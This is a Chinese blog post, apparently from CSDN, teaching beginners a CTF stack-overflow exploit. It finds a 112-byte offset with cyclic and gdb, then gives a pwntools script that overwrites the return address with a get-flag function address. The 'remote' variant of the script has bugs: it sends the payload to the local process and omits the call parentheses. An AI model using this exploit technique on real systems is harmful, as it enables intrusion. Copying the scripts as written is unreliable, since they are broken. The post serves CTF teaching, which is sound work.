PWN入门之栈溢出

最新推荐文章于 2024-05-16 21:11:40 发布
最新推荐文章于 2024-05-16 21:11:40 发布
阅读量1.2k 收藏 7
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681716/article/details/88420731
版权

实验目的

通过此次实验,目的是掌握如何去通过使栈溢出来get flag。

实验文件

链接:https://pan.baidu.com/s/1UFPRJcAcLud8dRe0sCKaSg
提取码:rkyi

实验步骤

  1. 先利用IDA对pwn文件进行静态调试
    对pwn文件进行反编译
    main主函数的反编译
    因为CFT是夺旗赛,所以我们首先要找到get flag的函数

  2. 利用gdb进行动态调试
    运行可执行文件pwn
    我们就可以利用栈溢出获取系统权限
    我认为有两种方法来获得使栈溢出所需要的填充量
    (1)、利用通过输入大量的字符来使其达到溢出,判断溢出的位置,从而获得栈长。
    cyclic函数
    我们利用cyclic length函数产生若干个有序字符。
    利用cyclic 300产生300个有序字符。在这里插入图片描述
    用gdb来运行pwn文件,利用run指令使程序跑起来,并将之前利用cyclic 300产生的有序字符输入。
    在这里插入图片描述
    输入后会使栈溢出,产生报错信息
    在这里插入图片描述
    获得0x62616164,看他报错的意思是(跳转到0x62616164)这步出错了,意思就是没有0x62616164这个位置,那这个位置是从哪来的呢?就是我们300个有序字符其中最先溢出的第部分。所以,0x62616164是栈溢出的位置。那么只要知道这个0x62616164是我们输入的第几个,就可以数出来它前头有几个数字了。然后利用cyclic -l,这个函数代表着查询你所给的4bit字符前有几个字母。
    在这里插入图片描述
    得到112,112就是我们填充栈所需的数量。
    (2)、利用gdb动态调试,找到ebp和esp的值
    找到函数中需要输入的位置
    在这里插入图片描述
    利用pattern create 200产生字符,并将产生的字符输入到该输入的地方
    在这里插入图片描述

    确认ebp到输入位置的偏移量为108
    在这里插入图片描述
    在这里插入图片描述
    但是,计算输入到ret的偏移量,所以就在加上0x04。得到偏移量为112。
    (3)、直接通过gdb调试,看函数输入位置到ret 的距离

    在这里插入图片描述
    通调试发现输入点的地址为esp+0x1c,而ret的位置在ebp+0x04
    所以需要填充的字符数为(ebp+0x04)-(esp+0x1c)=0x70=112(hex)。

  3. 获得覆盖ret的地址,即需要跳转的get flag的地址
    在这里插入图片描述

    这里get flag的地址为0x0804858B

  4. 编写payload脚本

    from pwn import *
    sh=process(’./pwn’)
    elf=ELF(’./pwn’)
    target=0x0804858B
    #覆盖ret的地址
    sh.sendline(‘a’*112+p32(target))
    #112为栈所需要的覆盖量
    sh.interactive

    利用python 3.py pwn来运行脚本在这里插入图片描述

  5. 远端控制
    pwn之远端控制,其他操作都不变,只是payload的脚本变了。

from pwn import *
    sh=process('./pwn')
    p = remote ("138.128.212.238" ,9999)
    #这里输入远程控制服务器的地址
    target=0x0804858B
    #覆盖ret的地址
    sh.sendline('a'*112+p32(target))
    #112为栈所需要的覆盖量
    sh.interactive

也是运用python 脚本名.py pwn
在这里插入图片描述

Han&Joe
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PWN基础知识及基础溢出手法
山高路远
04-12 3904
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
Python pwntools学习
PUTAOAO的博客
10-13 412
首先下载pwntools pwntools 也可以用pip装:pip install pwn 在python中调用 from pwn import * 连接 send(data) : 发送数据 sendline(data) : 发送一行数据,相当于在末尾加\n recv(numb=4096, timeout=default) : 给出接收字节数,timeout指定超时 recvuntil(delims, drop=False) : 接收到delims的pattern (以下可以看作until的特例) re
PWN入门--溢出
yjh_fnu_ltn的博客
05-07 943
将原main函数的ebp值低入保存,再为ebp换上新的esp寄存器值,作为访问fun函数局部变量等的基址。最后退出fun函数,需要将原ebp的值恢复,关闭并销毁fun函数的帧:通常使用与生成帧相反的指令。最后,在main函数中删除(在调用者还是在被调用者中清除,取决于函数的调用规定)。这次从的角度详细,计算垃圾数据填充大小时多少,system函数的参数如何传递的问题。后面看到盗用fun函数的过程,使用完成传参,此时还没有进入到fun函数,所以其。,在溢出的漏洞中,我们经常要用我们。
PWN 溢出
u012173720的博客
11-21 969
Beginning 如果想用溢出来执行攻击指令,就要在溢出数据内包含攻击指令的内容或地址,并且要将程序控制权交给该指令。攻击指令可以是自定义的指令片段,也可以利用系统内已有的函数及指令 0x01 函数调用是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“”是因为发生函数调用时,调用函数(caller)的状态被保存在内,被调用函数(ca...
溢出脚本_CTF必备技能丨Linux Pwn入门教程——溢出基础(文末有彩蛋)
weixin_39723248的博客
11-20 224
这是一套Linux Pwn入门教程系列,作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的一些题目和文章整理出一份相对完整的Linux Pwn教程。课程回顾>>Linux Pwn入门教程第一章:环境配置更多Pwn视频课程本系列教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如,堆,整数溢出,格式化字符串,条件竞争等进行介绍,所有环境都会...
PWN基础之函数调用溢出
weixin_46132162的博客
12-28 1377
在函数调用结束时,顶的函数(callee)状态被弹出,顶恢复到调用函数(caller)的状态函数调用在内存中从高地址向低地址生长,所以顶对应的内存地址在压时变小,退时变大。接下来vulnerable_function()函数会调用read()函数,这个时候vulnerable_function()函数为主调函数(caller function)read()函数为被调函数(callee function)read()函数 是有参数的,我们来看一看有参数的函数在函数调用是什么样的。
PWN入门迁移-附件资源
03-02
PWN入门迁移-附件资源
Linux pwn入门教程(1)——溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——溢出基础
一道pwn入门的练习题
10-23
直接以一个非常简单的溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\溢出基础\格式化字符串漏洞等
浅谈PWN基础-溢出
qq_45751349的博客
04-04 686
一、预备知识 缓冲区溢出简单介绍 缓冲区溢出:简单的说,缓冲区溢出就是超长的数据向小缓冲区复制,导致数据超出了小缓冲区,导致缓冲区其他的数据遭到破坏,这就是缓冲区溢出。而溢出是缓冲区溢出的一种,也是最常见的。只不过溢出发生在,堆溢出发生在堆,其实都是一样的。 二、简介 是一种计算机系统中的数据结构,它按照先进后出的原则存储数据,先进入的数据被压入底,最后的数据在顶,需要读数据的时...
python 解决递归调用溢出
weixin_33941350的博客
12-11 333
递归函数 2578次阅读 在函数内部,可以调用其他函数。如果一个函数在内部调用自身本身,这个函数就是递归函数。 举个例子,我们来计算阶乘n! = 1 x 2 x 3 x ... x n,用函数fact(n)表示,可以看出: fact(n) = n! = 1 x 2 x 3 x ... x (n-1) x n = (n-1)! x n = fact(n-1) x n 所以,fact(n...
【七日打卡】CTF是什么?一文带你读懂网络安全大赛
程序员阿飘 的博客
01-06 338
🖥是汇编语言中的一种数据结构,遵循LIFO(Last in Fist Out)原则,即后进先出。🚍的主要操作:压(Push)、出(Pop)。📌注意:从高地址向低地址存储。
pwn(基础的溢出-上)
最新发布
2302_80935968的博客
05-16 756
编译器使用堆传递函数参数、保存返回地址、临时保存寄存器原有值(即函数调用的上下文)以备恢复以及存储本地局部变量的特点:后进先出的数据结构,的结构是从进程高地址向进程低地址生长这里说一下寄存器:寄存器是处理器加工数据或运行程序的重要载体,用于存放程序执行中用到的数据和指令。因此函数调用的实现与处理器寄存器组密切相关。最初的8086中寄存器是16位,每个都有特殊用途,寄存器名城反映其不同用途。由于IA32平台采用平面寻址模式,对特殊寄存器的需求大大降低,但由于历史原因,这些寄存器名称被保留下来。
Python pwn 工具使用案例(基于一次ctf挑战赛)
Gomader的博客
05-21 1829
最近遇到一个ctf挑战题,Rock-Scissor-Paper, 石头剪刀布 具体内容就是1000次挑战程序,1000次全部获胜才能那道flag 这次挑战题的目的是了解计算机的伪随机数产生机制,在项目介绍pdf和程序运行一开始都会展示"It is not actually random ????" 虽然很快知道整个答案的顺序是不会改变的,每一次我都可以通过随意出拳来获得答案(如果对了就记录,如果错了也知道应该什么是对的,毕竟只有石头剪刀布) 面对这个问题,我第一次接触了python的pwntools(htt
二进制学习(pwn)-带后门的溢出
liulanghouzi的博客
09-21 872
帮助pwn爱好者入门~
PWN入门系列(2)溢出
小心信科理化声
12-02 1423
PWN入门系列(2) 溢出 溢出指的是程序向中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的中的变量的值被改变(覆盖)。是一种特定的缓冲区溢出漏洞,类似的还有heap、bss溢出等。其前提是: · 程序必须向上写入数据 程序对某个函数或者某个模块的输入数据的大小没有控制得当。 基本示例 举个简单的例子: #include <stdio.h> #include <string.h> void success() { puts("You Hava
PWN溢出
u012173720的博客
11-21 1531
Shellcode --修改返回地址,让其指向溢出数据中的一段指令 根据上面副标题的说明,要完成的任务包括:在溢出数据内包含一段攻击指令,用攻击指令的起始地址覆盖掉返回地址。攻击指令一般都是用来打开 shell,从而可以获得当前进程的控制权,所以这类指令片段也被成为“shellcode”。shellcode 可以用汇编语言来写再转成对应的机器码,也可以上网搜索直接复制粘贴,这里就不再赘述。下面...
pwn+溢出解题思路
11-10
溢出是一种常见的漏洞,攻击者可以通过利用溢出漏洞来执行恶意代码。pwn是一种利用溢出漏洞的攻击方式,通常用于CTF比赛中。下面是一些pwn解题思路的步骤: 1. 找到漏洞:首先需要找到程序中的漏洞,通常是溢出漏洞或格式化字符串漏洞。 2. 利用漏洞:利用漏洞来执行恶意代码,通常是通过覆盖返回地址或修改函数指针来实现。 3. 获取shell:利用漏洞执行恶意代码后,需要获取shell来进一步控制系统。可以通过调用system函数来执行shell命令。 4. 获取函数地址:在一些情况下,需要获取函数的地址来执行攻击。可以通过泄露函数地址或者使用动态链接库来获取函数地址。 5. 绕过保护机制:现代操作系统通常会有一些保护机制来防止pwn攻击,例如随机化、地址空间布局随机化等。攻击者需要找到绕过这些保护机制的方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值